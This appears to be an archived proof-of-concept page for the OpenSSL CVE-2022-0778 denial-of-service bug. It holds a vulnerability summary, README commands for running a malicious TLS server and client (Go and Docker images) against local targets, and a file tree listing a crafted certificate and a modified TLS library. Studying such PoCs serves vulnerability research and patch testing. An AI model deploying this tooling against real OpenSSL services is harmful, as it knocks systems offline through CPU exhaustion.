POC details: f288e6c14864bfe72d974e2ded35d37b12c656c1

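Source
Related vulnerability
Title: OpenSSL security vulnerability (CVE-2022-0778)
Description: OpenSSL is an open-source, general-purpose cryptographic library from the OpenSSL team that implements the Secure Sockets Layer (SSLv2/v3) and Transport Layer Security (TLSv1) protocols. It supports a variety of cryptographic algorithms, including symmetric ciphers, hash algorithms and secure hash algorithms. OpenSSL versions 1.0.2, 1.1.1 and 3.0 contain a security vulnerability caused by a bug in the BN_mod_sqrt() function, which computes modular square roots, and which may loop forever for non-prime moduli. An attacker can supply specially crafted parameter values to exploit the vulnerability and trigger a denial of service while the application is parsing a certificate.
Introduction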
# cve-2022-0778

## bad server

```
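# start the bad server
go run server/main.go --addr 127.0.0.1:12345

# run the server test script from the test directory
cd test && ./test_server.sh

# watch container CPU usage
docker stats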
```

## bad client

```
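# run the client test script (the file is named test_clinet.sh in the repository)
cd test && ./test_clinet.sh

# run the bad client
go run client/main.go --network tcp --addr 127.0.0.1:12345

# watch container CPU usage
docker stats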
```

## build

```
docker build -t cve-2022-0778 .
```

## docker hub

```
# start the vulnerable server
docker pull yywing/cve-2022-0778-target
docker run -it --rm -p 12345:12345 yywing/cve-2022-0778-target python server.py
# attack
docker pull yywing/cve-2022-0778
docker run -it --rm --entrypoint badclient yywing/cve-2022-0778 --addr host.docker.internal:12345

# start bad server
docker run -it --rm -p 12345:12345 yywing/cve-2022-0778 --addr 0.0.0.0:12345
# use a vulnerable client
docker run -it --rm yywing/cve-2022-0778-target python -c "import http.client;http.client.HTTPSConnection('host.docker.internal', 12345).request('GET', '/')"
# or
docker run -it --rm yywing/cve-2022-0778-target curl https://host.docker.internal:12345
```
File snapshot

```
[4.0K] /data/pocs/f288e6c14864bfe72d974e2ded35d37b12c656c1
├── [4.0K] certfile
│   ├── [ 492] badcert.der
│   ├── [ 206] cert.go
│   ├── [1.2K] server.crt
│   └── [1.6K] server.key
├── [4.0K] client
│   └── [1.0K] main.go
├── [4.0K] cpu
│   ├── [ 194] cpu_386.go
│   ├── [ 196] cpu_amd64.go
│   ├── [ 247] cpu_arm64_android.go
│   ├── [ 967] cpu_arm64_darwin.go
│   ├── [ 865] cpu_arm64_freebsd.go
│   ├── [ 812] cpu_arm64.go
│   ├── [2.0K] cpu_arm64_hwcap.go
│   ├── [ 281] cpu_arm64_linux.go
│   ├── [ 547] cpu_arm64_other.go
│   ├── [ 439] cpu_arm64.s
│   ├── [ 821] cpu_arm.go
│   ├── [6.8K] cpu.go
│   ├── [ 697] cpu_mips64x.go
│   ├── [ 220] cpu_mips.go
│   ├── [ 220] cpu_mipsle.go
│   ├── [ 620] cpu_no_name.go
│   ├── [ 485] cpu_ppc64x_aix.go
│   ├── [ 505] cpu_ppc64x.go
│   ├── [ 747] cpu_ppc64x_linux.go
│   ├── [ 220] cpu_riscv64.go
│   ├── [ 276] cpu.s
│   ├── [5.9K] cpu_s390x.go
│   ├── [2.2K] cpu_s390x.s
│   ├── [1.4K] cpu_s390x_test.go
│   ├── [ 220] cpu_wasm.go
│   ├── [4.2K] cpu_x86.go
│   ├── [ 600] cpu_x86.s
│   └── [ 200] export_test.go
├── [ 363] Dockerfile
├── [ 167] go.mod
├── [1.0K] go.sum
├── [ 973] README.md
├── [4.0K] server
│   └── [1.2K] main.go
├── [4.0K] test
│   ├── [ 137] Dockerfile
│   ├── [  22] server.crt -> ../certfile/server.crt
│   ├── [  22] server.key -> ../certfile/server.key
│   ├── [1.0K] server.py
│   ├── [ 125] test_clinet.sh
│   └── [ 158] test_server.sh
└── [4.0K] tls
    ├── [3.9K] alert.go
    ├── [9.8K] auth.go
    ├── [6.9K] auth_test.go
    ├── [ 25K] cipher_suites.go
    ├── [ 52K] common.go
    ├── [3.3K] common_string.go
    ├── [ 46K] conn.go
    ├── [9.7K] conn_test.go
    ├── [7.8K] example_test.go
    ├── [4.9K] generate_cert.go
    ├── [ 27K] handshake_client.go
    ├── [ 77K] handshake_client_test.go
    ├── [ 20K] handshake_client_tls13.go
    ├── [ 45K] handshake_messages.go
    ├── [ 13K] handshake_messages_test.go
    ├── [ 24K] handshake_server.go
    ├── [ 62K] handshake_server_test.go
    ├── [ 25K] handshake_server_tls13.go
    ├── [ 24K] handshake_test.go
    ├── [ 470] handshake_unix_test.go
    ├── [ 12K] key_agreement.go
    ├── [5.9K] key_schedule.go
    ├── [5.6K] key_schedule_test.go
    ├── [2.4K] link_test.go
    ├── [8.4K] prf.go
    ├── [5.7K] prf_test.go
    ├── [ 12K] testdata
    │   ├── [ 10K] Client-TLSv10-ClientCert-ECDSA-ECDSA
    │   ├── [ 10K] Client-TLSv10-ClientCert-ECDSA-RSA
    │   ├── [8.3K] Client-TLSv10-ClientCert-Ed25519
    │   ├── [10.0K] Client-TLSv10-ClientCert-RSA-ECDSA
    │   ├── [ 10K] Client-TLSv10-ClientCert-RSA-RSA
    │   ├── [6.8K] Client-TLSv10-ECDHE-ECDSA-AES
    │   ├── [7.1K] Client-TLSv10-ECDHE-RSA-AES
    │   ├── [   0] Client-TLSv10-Ed25519
    │   ├── [7.1K] Client-TLSv10-ExportKeyingMaterial
    │   ├── [6.2K] Client-TLSv10-RSA-RC4
    │   ├── [6.9K] Client-TLSv11-ECDHE-ECDSA-AES
    │   ├── [7.2K] Client-TLSv11-ECDHE-RSA-AES
    │   ├── [   0] Client-TLSv11-Ed25519
    │   ├── [6.2K] Client-TLSv11-RSA-RC4
    │   ├── [6.4K] Client-TLSv12-AES128-GCM-SHA256
    │   ├── [7.1K] Client-TLSv12-AES128-SHA256
    │   ├── [6.4K] Client-TLSv12-AES256-GCM-SHA384
    │   ├── [6.9K] Client-TLSv12-ALPN
    │   ├── [6.7K] Client-TLSv12-ALPN-NoMatch
    │   ├── [ 10K] Client-TLSv12-ClientCert-ECDSA-ECDSA
    │   ├── [ 10K] Client-TLSv12-ClientCert-ECDSA-RSA
    │   ├── [8.9K] Client-TLSv12-ClientCert-Ed25519
    │   ├── [ 10K] Client-TLSv12-ClientCert-RSA-AES256-GCM-SHA384
    │   ├── [ 10K] Client-TLSv12-ClientCert-RSA-ECDSA
    │   ├── [ 10K] Client-TLSv12-ClientCert-RSA-RSA
    │   ├── [ 10K] Client-TLSv12-ClientCert-RSA-RSAPKCS1v15
    │   ├── [ 11K] Client-TLSv12-ClientCert-RSA-RSAPSS
    │   ├── [6.9K] Client-TLSv12-ECDHE-ECDSA-AES
    │   ├── [7.2K] Client-TLSv12-ECDHE-ECDSA-AES128-SHA256
    │   ├── [6.5K] Client-TLSv12-ECDHE-ECDSA-AES256-GCM-SHA384
    │   ├── [6.5K] Client-TLSv12-ECDHE-ECDSA-AES-GCM
    │   ├── [6.2K] Client-TLSv12-ECDHE-ECDSA-CHACHA20-POLY1305
    │   ├── [7.2K] Client-TLSv12-ECDHE-RSA-AES
    │   ├── [7.5K] Client-TLSv12-ECDHE-RSA-AES128-SHA256
    │   ├── [6.5K] Client-TLSv12-ECDHE-RSA-CHACHA20-POLY1305
    │   ├── [5.0K] Client-TLSv12-Ed25519
    │   ├── [6.7K] Client-TLSv12-ExportKeyingMaterial
    │   ├── [7.3K] Client-TLSv12-P256-ECDHE
    │   ├── [ 18K] Client-TLSv12-RenegotiateOnce
    │   ├── [ 26K] Client-TLSv12-RenegotiateTwice
    │   ├── [ 18K] Client-TLSv12-RenegotiateTwiceRejected
    │   ├── [7.0K] Client-TLSv12-RenegotiationRejected
    │   ├── [6.2K] Client-TLSv12-RSA-RC4
    │   ├── [8.4K] Client-TLSv12-SCT
    │   ├── [6.8K] Client-TLSv12-X25519-ECDHE
    │   ├── [6.8K] Client-TLSv13-AES128-SHA256
    │   ├── [6.9K] Client-TLSv13-AES256-SHA384
    │   ├── [7.0K] Client-TLSv13-ALPN
    │   ├── [6.8K] Client-TLSv13-CHACHA20-SHA256
    │   ├── [ 11K] Client-TLSv13-ClientCert-ECDSA-RSA
    │   ├── [9.2K] Client-TLSv13-ClientCert-Ed25519
    │   ├── [ 10K] Client-TLSv13-ClientCert-RSA-ECDSA
    │   ├── [ 11K] Client-TLSv13-ClientCert-RSA-RSAPSS
    │   ├── [6.5K] Client-TLSv13-ECDSA
    │   ├── [5.1K] Client-TLSv13-Ed25519
    │   ├── [6.8K] Client-TLSv13-ExportKeyingMaterial
    │   ├── [8.9K] Client-TLSv13-HelloRetryRequest
    │   ├── [7.5K] Client-TLSv13-KeyUpdate
    │   ├── [7.1K] Client-TLSv13-P256-ECDHE
    │   ├── [6.8K] Client-TLSv13-X25519-ECDHE
    │   ├── [ 587] example-cert.pem
    │   ├── [ 227] example-key.pem
    │   ├── [5.9K] Server-TLSv10-ECDHE-ECDSA-AES
    │   ├── [7.0K] Server-TLSv10-ExportKeyingMaterial
    │   ├── [5.6K] Server-TLSv10-RSA-3DES
    │   ├── [5.9K] Server-TLSv10-RSA-AES
    │   ├── [5.4K] Server-TLSv10-RSA-RC4
    │   ├── [ 758] Server-TLSv11-FallbackSCSV
    │   ├── [5.4K] Server-TLSv11-RSA-RC4
    │   ├── [6.9K] Server-TLSv12-ALPN
    │   ├── [6.8K] Server-TLSv12-ALPN-Fallback
    │   ├── [ 985] Server-TLSv12-ALPN-NoMatch
    │   ├── [6.8K] Server-TLSv12-ALPN-NotConfigured
    │   ├── [9.5K] Server-TLSv12-ClientAuthRequestedAndECDSAGiven
    │   ├── [8.2K] Server-TLSv12-ClientAuthRequestedAndEd25519Given
    │   ├── [9.4K] Server-TLSv12-ClientAuthRequestedAndGiven
    │   ├── [9.4K] Server-TLSv12-ClientAuthRequestedAndPKCS1v15Given
    │   ├── [6.3K] Server-TLSv12-ClientAuthRequestedNotGiven
    │   ├── [6.3K] Server-TLSv12-ECDHE-ECDSA-AES
    │   ├── [4.2K] Server-TLSv12-Ed25519
    │   ├── [6.6K] Server-TLSv12-ExportKeyingMaterial
    │   ├── [6.8K] Server-TLSv12-IssueTicket
    │   ├── [6.8K] Server-TLSv12-IssueTicketPreDisable
    │   ├── [6.4K] Server-TLSv12-P256
    │   ├── [3.3K] Server-TLSv12-Resume
    │   ├── [6.8K] Server-TLSv12-ResumeDisabled
    │   ├── [5.9K] Server-TLSv12-RSA-3DES
    │   ├── [6.3K] Server-TLSv12-RSA-AES
    │   ├── [6.1K] Server-TLSv12-RSA-AES256-GCM-SHA384
    │   ├── [6.1K] Server-TLSv12-RSA-AES-GCM
    │   ├── [5.6K] Server-TLSv12-RSA-RC4
    │   ├── [5.7K] Server-TLSv12-RSA-RSAPKCS1v15
    │   ├── [5.7K] Server-TLSv12-RSA-RSAPSS
    │   ├── [6.3K] Server-TLSv12-SNI
    │   ├── [6.3K] Server-TLSv12-SNI-GetCertificate
    │   ├── [6.3K] Server-TLSv12-SNI-GetCertificateNotFound
    │   ├── [6.1K] Server-TLSv12-X25519
    │   ├── [7.5K] Server-TLSv13-AES128-SHA256
    │   ├── [7.7K] Server-TLSv13-AES256-SHA384
    │   ├── [7.5K] Server-TLSv13-ALPN
    │   ├── [7.5K] Server-TLSv13-ALPN-Fallback
    │   ├── [2.0K] Server-TLSv13-ALPN-NoMatch
    │   ├── [7.5K] Server-TLSv13-ALPN-NotConfigured
    │   ├── [7.5K] Server-TLSv13-CHACHA20-SHA256
    │   ├── [ 14K] Server-TLSv13-ClientAuthRequestedAndECDSAGiven
    │   ├── [ 11K] Server-TLSv13-ClientAuthRequestedAndEd25519Given
    │   ├── [ 13K] Server-TLSv13-ClientAuthRequestedAndGiven
    │   ├── [7.8K] Server-TLSv13-ClientAuthRequestedNotGiven
    │   ├── [7.2K] Server-TLSv13-ECDHE-ECDSA-AES
    │   ├── [5.7K] Server-TLSv13-Ed25519
    │   ├── [7.4K] Server-TLSv13-ExportKeyingMaterial
    │   ├── [9.2K] Server-TLSv13-HelloRetryRequest
    │   ├── [7.4K] Server-TLSv13-IssueTicket
    │   ├── [7.4K] Server-TLSv13-IssueTicketPreDisable
    │   ├── [7.7K] Server-TLSv13-P256
    │   ├── [4.4K] Server-TLSv13-Resume
    │   ├── [7.4K] Server-TLSv13-ResumeDisabled
    │   ├── [7.1K] Server-TLSv13-Resume-HelloRetryRequest
    │   ├── [7.3K] Server-TLSv13-RSA-RSAPSS
    │   ├── [1.0K] Server-TLSv13-RSA-RSAPSS-TooSmall
    │   └── [7.3K] Server-TLSv13-X25519
    ├── [5.2K] ticket.go
    ├── [ 12K] tls.go
    └── [ 47K] tls_test.go

7 directories, 194 files
```